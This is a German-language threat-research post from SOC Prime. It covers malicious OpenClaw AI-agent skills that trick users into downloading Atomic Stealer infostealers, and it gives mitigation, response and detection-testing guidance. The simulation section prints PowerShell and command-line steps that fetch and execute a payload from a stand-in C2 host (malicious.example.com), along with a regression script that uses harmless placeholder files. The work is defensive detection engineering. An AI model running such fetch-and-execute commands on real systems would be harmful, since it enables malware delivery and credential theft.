SOC Prime Bias: Kritisch

04 Feb 2026 14:31 UTC

Von Automatisierung zur Infektion: Wie OpenClaw AI-Agentenfähigkeiten bewaffnet werden

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Von Automatisierung zur Infektion: Wie OpenClaw AI-Agentenfähigkeiten bewaffnet werden
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Artikel erklärt, wie bösartige OpenClaw-Skills als Malware-Übertragungsmechanismus für Nutzer der selbstgehosteten AI-Agent-Plattform genutzt werden. Bedrohungsakteure veröffentlichen Skills, die harmlos erscheinen, die Opfer jedoch letztendlich dazu verleiten, von Angreifern kontrollierte Binärdateien aus externen Quellen herunterzuladen und auszuführen. Beobachtete Nutzlasten umfassen Windows-Ausführbare Dateien und macOS Mach-O-Dateien, die als Varianten der Atomic Stealer Infostealer-Familie identifiziert wurden. Diese Aktivität stellt ein praktisches Versorgungskettenrisiko für persönliche und Entwickler-Arbeitsstationen dar, die auf von der Community bereitgestellte Skills angewiesen sind.

Untersuchung

VirusTotal Code Insight hat mehr als dreitausend OpenClaw-Skills überprüft und Hunderte entdeckt, die bösartiges oder risikobehaftetes Verhalten zeigten. In einem Beispiel bot ein von hightower6eu hochgeladener Skill eine Schritt-für-Schritt-Anleitung zum Herunterladen eines passwortgeschützten ZIP-Archivs von GitHub (Passwort: openclaw) und zur Ausführung von openclaw-agent.exe auf Windows. Auf macOS führte derselbe Skill Benutzer dazu, ein Base64-codiertes Skript von glot.io abzurufen, das dann eine Mach-O-Ausführbare Datei herunterlud und ausführte. Die resultierenden Binärdateien wurden von mehreren Sicherheitsengines als Trojanisierte Infostealer erkannt.

Minderung

Behandeln Sie Skill-Repositories als unzuverlässigen Code und führen Sie OpenClaw in einer sandboxed oder eng begrenzten Umgebung aus. Vermeiden Sie das Einfügen von Befehlen aus Skill-Beschreibungen und führen Sie keine Binärdateien aus, die aus nicht verifizierten externen Links abgerufen werden. Für Betreiber von Marktplätzen und Communities implementieren Sie eine Veröffentlichungsscan, der sich auf Remote-Download-Verhalten, obfuscierte Skriptlogik und Indikatoren für Anmeldeinformationsdiebstahl oder Datenexfiltration konzentriert. In Unternehmensumgebungen schulen Sie Benutzer über die Risiken der Installation von Community-erstellten Skills und fordern vor der Nutzung eine Überprüfung an.

Antwort

Suchen Sie nach OpenClaw-Skill-Paketen, die auf externe Download-URLs, passwortgeschützte Archive oder codierte Befehls-Stager verweisen. Alarmieren Sie bei der Ausführung unbekannter Binärdateien namens openclaw-agent.exe und bei verdächtigen Mach-O-Starts, die auf geskriptete Download-Aktivitäten folgen. Blockieren Sie die Konnektivität zu bekannten bösartigen Domänen und isolieren Sie betroffene Systeme für eine forensische Untersuchung, um zu bestätigen, ob eine Infostealer-Ausführung und eine Anmeldeinformations-Offenlegung stattgefunden hat.

Angriffsfluss

Simulationsausführung

Voraussetzung: Der Telemetrie- & Basislinien-Vorflug-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer hat sich Zugang zu einem Opferarbeitsplatz verschafft und platziert die bösartige Binärdatei openclaw-agent.exe in das temporäre Verzeichnis des Benutzers. Die Binärdatei wird mit einer Befehlszeile ausgeführt, die ausdrücklich die Schlüsselwörter enthält herunterladen and ausführen , um zusätzliche Nutzlasten von einem nicht vertrauenswürdigen C2-Server abzurufen und im Speicher auszuführen. Der Angreifer verwendet eine Standard-Windows-Eingabeaufforderung, um PowerShell-spezifischen Erkennungen zu vermeiden und so den Erwartungen der Sigma-Regel zu entsprechen.

    1. Die Nutzlast ablegen:
      $malPath = "$env:TEMPopenclaw-agent.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath
    2. Mit verdächtigen Argumenten ausführen:
      "%TEMP%openclaw-agent.exe" download http://malicious.example.com/payload.bin execute
    3. Der Agent kontaktiert den C2-Server, lädt payload.binherunter, schreibt es auf die Festplatte und startet es, während die ursprüngliche Prozess-Befehlszeile weiterhin die Triggerwörter enthält.
  • Regressionstest-Skript:

    # -----------------------------------------------------------------------
    # OpenClaw Agent Execution Simulation – löst Sigma-Erkennung aus
    # -----------------------------------------------------------------------
    # 1. Laden Sie den bösartigen Agent herunter (simuliert mit einer harmlosen Datei)
    $agentUrl   = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi"  # Platzhalter harmlose Datei
    $agentPath  = "$env:TEMPopenclaw-agent.exe"
    Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath
    
    # 2. Führen Sie den Agent mit den erwarteten Befehlszeilen-Schlüsselwörtern aus
    $cmd = "`"$agentPath`" download http://malicious.example.com/payload.bin execute"
    Write-Host "Ausführen: $cmd"
    Start-Process -FilePath $agentPath -ArgumentList "download http://malicious.example.com/payload.bin execute" -NoNewWindow -Wait
    
    # 3. Optional: Simulieren Sie den Payload-Download (harmloser Stub)
    $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md"
    $payloadPath = "$env:TEMPpayload.bin"
    Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath
    
    Write-Host "Simulation abgeschlossen. Überprüfen Sie SIEM auf Erkennung."
  • Bereinigungsbefehle:

    # Entfernen Sie alle während der Simulation erstellten Artefakte
    $paths = @(
        "$env:TEMPopenclaw-agent.exe",
        "$env:TEMPpayload.bin"
    )
    foreach ($p in $paths) {
        if (Test-Path $p) {
            Remove-Item -Path $p -Force
            Write-Host "Gelöscht $p"
        }
    }